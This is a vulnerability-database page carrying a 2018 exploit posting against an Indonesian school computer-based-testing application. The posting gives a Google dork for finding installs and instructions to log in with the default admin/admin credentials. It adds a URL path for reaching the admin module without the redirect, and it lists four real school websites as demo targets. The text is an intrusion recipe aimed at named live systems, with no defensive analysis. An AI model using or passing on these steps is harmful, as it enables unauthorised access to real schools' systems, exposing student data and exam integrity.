Aplikasi CBT Indonesian School Admin Weak Password

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034889 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050315
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
***************************************************
# Exploit Title: Aplikasi CBT Indonesian School Admin Weak Password
# Google Dork: inurl:/panel/pages/login.php
# Exploit: /pages/?modul=info_skul
# Date: 31/05/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Login with username and password admin
[+] Weak? You redirect to dashboard admin
[+] You can try no redirect in firefox with exploit /pages/?modul=info_skul
***************************************************
[+] Demo Site
[+] https://cbt.smpn2sembawa.sch.id/admin/pages/login.php
[+] http://tryout.smpm18surabaya.sch.id/panel/pages/login.php
[+] http://fityangowa.sch.id/cbt/panel/pages/login.php
[+] http://cbt.smkmahasasumberrejo.sch.id/panel/pages/login.php
***************************************************
Thanks To Error Violence